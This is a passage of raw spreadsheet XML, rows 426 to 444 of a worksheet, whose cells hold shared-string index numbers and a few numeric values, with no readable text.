      <c r="A426" s="12">
        <v>1662</v>
      </c>
      <c r="B426" s="12" t="s">
        <v>30450</v>
      </c>
      <c r="D426" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E426" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F426" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G426" s="12" t="s">
        <v>3423</v>
      </c>
      <c r="H426" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I426" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J426" s="12" t="s">
        <v>2609</v>
      </c>
      <c r="K426" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L426" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M426" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N426" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O426" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P426" s="12" t="s">
        <v>3031</v>
      </c>
      <c r="Q426" s="12">
        <v>2.6</v>
      </c>
      <c r="R426" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S426" s="12" t="s">
        <v>3424</v>
      </c>
      <c r="T426" s="12" t="s">
        <v>3425</v>
      </c>
      <c r="U426" s="12" t="s">
        <v>3426</v>
      </c>
      <c r="V426" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W426" s="12" t="s">
        <v>3427</v>
      </c>
      <c r="X426" s="12">
        <v>43</v>
      </c>
      <c r="Y426" s="12" t="s">
        <v>3428</v>
      </c>
    </row>
    <row r="427" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A427" s="12">
        <v>1667</v>
      </c>
      <c r="B427" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C427" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D427" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F427" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G427" s="12" t="s">
        <v>3429</v>
      </c>
      <c r="H427" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I427" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J427" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K427" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L427" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M427" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N427" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O427" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P427" s="12" t="s">
        <v>3430</v>
      </c>
      <c r="Q427" s="12">
        <v>2.6</v>
      </c>
      <c r="R427" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S427" s="12" t="s">
        <v>3431</v>
      </c>
      <c r="T427" s="12" t="s">
        <v>3432</v>
      </c>
      <c r="U427" s="12" t="s">
        <v>3291</v>
      </c>
      <c r="V427" s="12" t="s">
        <v>197</v>
      </c>
      <c r="W427" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X427" s="12">
        <v>1</v>
      </c>
      <c r="Y427" s="12" t="s">
        <v>3433</v>
      </c>
    </row>
    <row r="428" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A428" s="12">
        <v>1683</v>
      </c>
      <c r="B428" s="12" t="s">
        <v>28694</v>
      </c>
      <c r="D428" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F428" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G428" s="12" t="s">
        <v>3437</v>
      </c>
      <c r="H428" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I428" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J428" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K428" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L428" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M428" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N428" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O428" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P428" s="12" t="s">
        <v>3031</v>
      </c>
      <c r="Q428" s="12">
        <v>2.6</v>
      </c>
      <c r="R428" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S428" s="12" t="s">
        <v>3438</v>
      </c>
      <c r="T428" s="12" t="s">
        <v>3439</v>
      </c>
      <c r="U428" s="12" t="s">
        <v>2926</v>
      </c>
      <c r="V428" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W428" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X428" s="12">
        <v>4</v>
      </c>
      <c r="Y428" s="12" t="s">
        <v>3440</v>
      </c>
    </row>
    <row r="429" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A429" s="12">
        <v>1686</v>
      </c>
      <c r="B429" s="12" t="s">
        <v>28695</v>
      </c>
      <c r="C429" s="12" t="s">
        <v>28696</v>
      </c>
      <c r="D429" s="12" t="s">
        <v>28697</v>
      </c>
      <c r="E429" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F429" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G429" s="12" t="s">
        <v>3441</v>
      </c>
      <c r="H429" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I429" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J429" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K429" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L429" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M429" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N429" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O429" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P429" s="12" t="s">
        <v>3366</v>
      </c>
      <c r="Q429" s="12">
        <v>2.4</v>
      </c>
      <c r="R429" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S429" s="12" t="s">
        <v>3442</v>
      </c>
      <c r="T429" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="U429" s="12" t="s">
        <v>2573</v>
      </c>
      <c r="V429" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W429" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X429" s="12">
        <v>2</v>
      </c>
      <c r="Y429" s="12" t="s">
        <v>3443</v>
      </c>
    </row>
    <row r="430" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A430" s="12">
        <v>1690</v>
      </c>
      <c r="B430" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C430" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D430" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E430" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F430" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G430" s="12" t="s">
        <v>3444</v>
      </c>
      <c r="H430" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I430" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J430" s="12" t="s">
        <v>754</v>
      </c>
      <c r="K430" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L430" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M430" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N430" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O430" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P430" s="12" t="s">
        <v>3366</v>
      </c>
      <c r="Q430" s="12">
        <v>2.4</v>
      </c>
      <c r="R430" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S430" s="12" t="s">
        <v>3445</v>
      </c>
      <c r="T430" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="U430" s="12" t="s">
        <v>3446</v>
      </c>
      <c r="V430" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W430" s="12" t="s">
        <v>3447</v>
      </c>
      <c r="X430" s="12">
        <v>39</v>
      </c>
      <c r="Y430" s="12" t="s">
        <v>3448</v>
      </c>
    </row>
    <row r="431" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A431" s="12">
        <v>1696</v>
      </c>
      <c r="B431" s="12" t="s">
        <v>28672</v>
      </c>
      <c r="D431" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E431" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F431" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G431" s="12" t="s">
        <v>3450</v>
      </c>
      <c r="H431" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I431" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J431" s="12" t="s">
        <v>201</v>
      </c>
      <c r="K431" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L431" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M431" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N431" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O431" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P431" s="12" t="s">
        <v>2528</v>
      </c>
      <c r="Q431" s="12">
        <v>2.6</v>
      </c>
      <c r="R431" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S431" s="12" t="s">
        <v>3451</v>
      </c>
      <c r="T431" s="12" t="s">
        <v>3452</v>
      </c>
      <c r="U431" s="12" t="s">
        <v>3453</v>
      </c>
      <c r="V431" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W431" s="12">
        <v>1697</v>
      </c>
      <c r="X431" s="12">
        <v>15</v>
      </c>
      <c r="Y431" s="12" t="s">
        <v>3454</v>
      </c>
    </row>
    <row r="432" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A432" s="12">
        <v>1706</v>
      </c>
      <c r="B432" s="12" t="s">
        <v>28698</v>
      </c>
      <c r="C432" s="12" t="s">
        <v>28699</v>
      </c>
      <c r="D432" s="12" t="s">
        <v>28700</v>
      </c>
      <c r="E432" s="12" t="s">
        <v>31452</v>
      </c>
      <c r="F432" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G432" s="12" t="s">
        <v>3466</v>
      </c>
      <c r="H432" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I432" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J432" s="12" t="s">
        <v>2531</v>
      </c>
      <c r="K432" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L432" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M432" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N432" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O432" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P432" s="12" t="s">
        <v>2489</v>
      </c>
      <c r="Q432" s="12">
        <v>2.4</v>
      </c>
      <c r="R432" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S432" s="12" t="s">
        <v>3467</v>
      </c>
      <c r="T432" s="12" t="s">
        <v>3468</v>
      </c>
      <c r="U432" s="12" t="s">
        <v>3469</v>
      </c>
      <c r="V432" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="W432" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X432" s="12">
        <v>6</v>
      </c>
      <c r="Y432" s="12" t="s">
        <v>3470</v>
      </c>
    </row>
    <row r="433" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A433" s="12">
        <v>1707</v>
      </c>
      <c r="B433" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C433" s="12" t="s">
        <v>28492</v>
      </c>
      <c r="D433" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F433" s="12" t="s">
        <v>29755</v>
      </c>
      <c r="G433" s="12" t="s">
        <v>3471</v>
      </c>
      <c r="H433" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I433" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J433" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K433" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L433" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M433" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N433" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O433" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P433" s="12" t="s">
        <v>2528</v>
      </c>
      <c r="Q433" s="12">
        <v>2.6</v>
      </c>
      <c r="R433" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S433" s="12" t="s">
        <v>3472</v>
      </c>
      <c r="T433" s="12" t="s">
        <v>3473</v>
      </c>
      <c r="U433" s="12" t="s">
        <v>3474</v>
      </c>
      <c r="V433" s="12" t="s">
        <v>1472</v>
      </c>
      <c r="W433" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X433" s="12">
        <v>1</v>
      </c>
      <c r="Y433" s="12" t="s">
        <v>3475</v>
      </c>
    </row>
    <row r="434" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A434" s="12">
        <v>1712</v>
      </c>
      <c r="B434" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D434" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F434" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G434" s="12" t="s">
        <v>3478</v>
      </c>
      <c r="H434" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I434" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J434" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K434" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L434" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M434" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N434" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O434" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P434" s="12" t="s">
        <v>3031</v>
      </c>
      <c r="Q434" s="12">
        <v>2.6</v>
      </c>
      <c r="R434" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S434" s="12" t="s">
        <v>3479</v>
      </c>
      <c r="T434" s="12" t="s">
        <v>3480</v>
      </c>
      <c r="U434" s="12" t="s">
        <v>3481</v>
      </c>
      <c r="V434" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W434" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X434" s="12">
        <v>7</v>
      </c>
      <c r="Y434" s="12" t="s">
        <v>3482</v>
      </c>
    </row>
    <row r="435" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A435" s="12">
        <v>1714</v>
      </c>
      <c r="B435" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C435" s="12" t="s">
        <v>28701</v>
      </c>
      <c r="D435" s="12" t="s">
        <v>28677</v>
      </c>
      <c r="F435" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G435" s="12" t="s">
        <v>3488</v>
      </c>
      <c r="H435" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I435" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J435" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K435" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L435" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M435" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N435" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O435" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P435" s="12" t="s">
        <v>2528</v>
      </c>
      <c r="Q435" s="12">
        <v>2.6</v>
      </c>
      <c r="R435" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S435" s="12" t="s">
        <v>3489</v>
      </c>
      <c r="T435" s="12" t="s">
        <v>1745</v>
      </c>
      <c r="U435" s="12" t="s">
        <v>3490</v>
      </c>
      <c r="V435" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W435" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X435" s="12">
        <v>3</v>
      </c>
      <c r="Y435" s="12" t="s">
        <v>3491</v>
      </c>
    </row>
    <row r="436" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A436" s="12">
        <v>1720</v>
      </c>
      <c r="B436" s="12" t="s">
        <v>28672</v>
      </c>
      <c r="D436" s="12" t="s">
        <v>28702</v>
      </c>
      <c r="E436" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F436" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G436" s="12" t="s">
        <v>3492</v>
      </c>
      <c r="H436" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I436" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J436" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K436" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L436" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M436" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N436" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O436" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P436" s="12" t="s">
        <v>2528</v>
      </c>
      <c r="Q436" s="12">
        <v>2.6</v>
      </c>
      <c r="R436" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S436" s="12" t="s">
        <v>3493</v>
      </c>
      <c r="T436" s="12" t="s">
        <v>3494</v>
      </c>
      <c r="U436" s="12" t="s">
        <v>3495</v>
      </c>
      <c r="V436" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W436" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X436" s="12">
        <v>4</v>
      </c>
      <c r="Y436" s="12" t="s">
        <v>3496</v>
      </c>
    </row>
    <row r="437" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A437" s="12">
        <v>1728</v>
      </c>
      <c r="B437" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D437" s="12" t="s">
        <v>28702</v>
      </c>
      <c r="E437" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F437" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G437" s="12" t="s">
        <v>3497</v>
      </c>
      <c r="H437" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I437" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J437" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K437" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L437" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M437" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N437" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O437" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P437" s="12" t="s">
        <v>2528</v>
      </c>
      <c r="Q437" s="12">
        <v>2.6</v>
      </c>
      <c r="R437" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S437" s="12" t="s">
        <v>3498</v>
      </c>
      <c r="T437" s="12" t="s">
        <v>2858</v>
      </c>
      <c r="U437" s="12" t="s">
        <v>3108</v>
      </c>
      <c r="V437" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W437" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X437" s="12">
        <v>15</v>
      </c>
      <c r="Y437" s="12" t="s">
        <v>3499</v>
      </c>
    </row>
    <row r="438" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A438" s="12">
        <v>1729</v>
      </c>
      <c r="B438" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D438" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E438" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F438" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G438" s="12" t="s">
        <v>3500</v>
      </c>
      <c r="H438" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I438" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J438" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K438" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L438" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M438" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N438" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O438" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P438" s="12" t="s">
        <v>3366</v>
      </c>
      <c r="Q438" s="12">
        <v>2.4</v>
      </c>
      <c r="R438" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S438" s="12" t="s">
        <v>3501</v>
      </c>
      <c r="T438" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="U438" s="12" t="s">
        <v>3502</v>
      </c>
      <c r="V438" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W438" s="12">
        <v>2083</v>
      </c>
      <c r="X438" s="12">
        <v>5</v>
      </c>
      <c r="Y438" s="12" t="s">
        <v>3503</v>
      </c>
    </row>
    <row r="439" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A439" s="12">
        <v>1732</v>
      </c>
      <c r="B439" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D439" s="12" t="s">
        <v>28703</v>
      </c>
      <c r="E439" s="12" t="s">
        <v>31465</v>
      </c>
      <c r="F439" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G439" s="12" t="s">
        <v>3504</v>
      </c>
      <c r="H439" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I439" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J439" s="12" t="s">
        <v>1873</v>
      </c>
      <c r="K439" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L439" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M439" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N439" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O439" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P439" s="12" t="s">
        <v>2528</v>
      </c>
      <c r="Q439" s="12">
        <v>2.6</v>
      </c>
      <c r="R439" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S439" s="12" t="s">
        <v>3505</v>
      </c>
      <c r="T439" s="12" t="s">
        <v>3506</v>
      </c>
      <c r="U439" s="12" t="s">
        <v>3507</v>
      </c>
      <c r="V439" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W439" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X439" s="12">
        <v>15</v>
      </c>
      <c r="Y439" s="12" t="s">
        <v>3508</v>
      </c>
    </row>
    <row r="440" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A440" s="12">
        <v>1743</v>
      </c>
      <c r="B440" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D440" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F440" s="12" t="s">
        <v>29728</v>
      </c>
      <c r="G440" s="12" t="s">
        <v>3509</v>
      </c>
      <c r="H440" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I440" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J440" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K440" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L440" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M440" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N440" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O440" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P440" s="12" t="s">
        <v>2528</v>
      </c>
      <c r="Q440" s="12">
        <v>2.6</v>
      </c>
      <c r="R440" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S440" s="12" t="s">
        <v>3510</v>
      </c>
      <c r="T440" s="12" t="s">
        <v>3511</v>
      </c>
      <c r="U440" s="12" t="s">
        <v>572</v>
      </c>
      <c r="V440" s="12" t="s">
        <v>130</v>
      </c>
      <c r="W440" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X440" s="12">
        <v>1</v>
      </c>
      <c r="Y440" s="12" t="s">
        <v>3512</v>
      </c>
    </row>
    <row r="441" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A441" s="12">
        <v>1744</v>
      </c>
      <c r="B441" s="12" t="s">
        <v>28676</v>
      </c>
      <c r="D441" s="12" t="s">
        <v>28704</v>
      </c>
      <c r="E441" s="12" t="s">
        <v>31426</v>
      </c>
      <c r="F441" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G441" s="12" t="s">
        <v>3513</v>
      </c>
      <c r="H441" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I441" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J441" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K441" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L441" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M441" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N441" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O441" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P441" s="12" t="s">
        <v>3514</v>
      </c>
      <c r="Q441" s="12">
        <v>2.4</v>
      </c>
      <c r="R441" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S441" s="12" t="s">
        <v>3515</v>
      </c>
      <c r="T441" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="U441" s="12" t="s">
        <v>3516</v>
      </c>
      <c r="V441" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="W441" s="12">
        <v>2857</v>
      </c>
      <c r="X441" s="12">
        <v>29</v>
      </c>
      <c r="Y441" s="12" t="s">
        <v>3517</v>
      </c>
    </row>
    <row r="442" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A442" s="12">
        <v>1746</v>
      </c>
      <c r="B442" s="12" t="s">
        <v>28694</v>
      </c>
      <c r="D442" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F442" s="12" t="s">
        <v>29728</v>
      </c>
      <c r="G442" s="12" t="s">
        <v>3523</v>
      </c>
      <c r="H442" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I442" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J442" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K442" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L442" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M442" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N442" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O442" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P442" s="12" t="s">
        <v>2528</v>
      </c>
      <c r="Q442" s="12">
        <v>2.6</v>
      </c>
      <c r="R442" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S442" s="12" t="s">
        <v>3524</v>
      </c>
      <c r="T442" s="12" t="s">
        <v>3525</v>
      </c>
      <c r="U442" s="12" t="s">
        <v>3526</v>
      </c>
      <c r="V442" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W442" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X442" s="12">
        <v>1</v>
      </c>
      <c r="Y442" s="12" t="s">
        <v>3528</v>
      </c>
    </row>
    <row r="443" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A443" s="12">
        <v>1749</v>
      </c>
      <c r="B443" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C443" s="12" t="s">
        <v>28357</v>
      </c>
      <c r="D443" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E443" s="12" t="s">
        <v>31426</v>
      </c>
      <c r="F443" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G443" s="12" t="s">
        <v>3529</v>
      </c>
      <c r="H443" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I443" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J443" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K443" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L443" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M443" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N443" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O443" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P443" s="12" t="s">
        <v>2528</v>
      </c>
      <c r="Q443" s="12">
        <v>2.6</v>
      </c>
      <c r="R443" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S443" s="12" t="s">
        <v>3530</v>
      </c>
      <c r="T443" s="12" t="s">
        <v>3531</v>
      </c>
      <c r="U443" s="12" t="s">
        <v>3532</v>
      </c>
      <c r="V443" s="12" t="s">
        <v>2911</v>
      </c>
      <c r="W443" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X443" s="12">
        <v>5</v>
      </c>
      <c r="Y443" s="12" t="s">
        <v>3533</v>
      </c>
    </row>
    <row r="444" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A444" s="12">
        <v>1755</v>
      </c>
      <c r="B444" s="12" t="s">
        <v>28705</v>
      </c>
      <c r="C444" s="12" t="s">
        <v>28706</v>
      </c>
      <c r="D444" s="12" t="s">
        <v>28707</v>
      </c>
      <c r="F444" s="12" t="s">
        <v>29727</v>
      </c>
      <c r="G444" s="12" t="s">
        <v>3534</v>
      </c>
      <c r="H444" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I444" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J444" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K444" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L444" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M444" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N444" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O444" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P444" s="12" t="s">
        <v>2528</v>
      </c>
      <c r="Q444" s="12">
        <v>2.6</v>
      </c>
      <c r="R444" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S444" s="12" t="s">
        <v>3535</v>
      </c>
      <c r="T444" s="12" t="s">
        <v>2814</v>
      </c>
      <c r="U444" s="12" t="s">
        <v>3536</v>
      </c>
      <c r="V444" s="12" t="s">
